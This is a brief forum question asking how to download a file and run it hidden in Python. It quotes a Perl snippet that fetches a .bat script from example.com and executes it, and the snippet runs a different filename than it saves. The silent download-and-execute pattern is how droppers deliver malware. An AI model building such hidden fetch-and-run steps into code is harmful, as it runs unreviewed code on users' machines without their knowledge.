how to download file then run it with hide mode! in python
- by Str1k3r
hello i was searching about how to download file then run it !
such as in perl
#!/usr/bin/perl -w
use LWP::Simple;
getstore('http://example.com/file.bat',
'sfile.bat');
system('file.bat');
ummmm so can i made like that in python ?
umm i guess we have to use urllib and os in python ? or what :S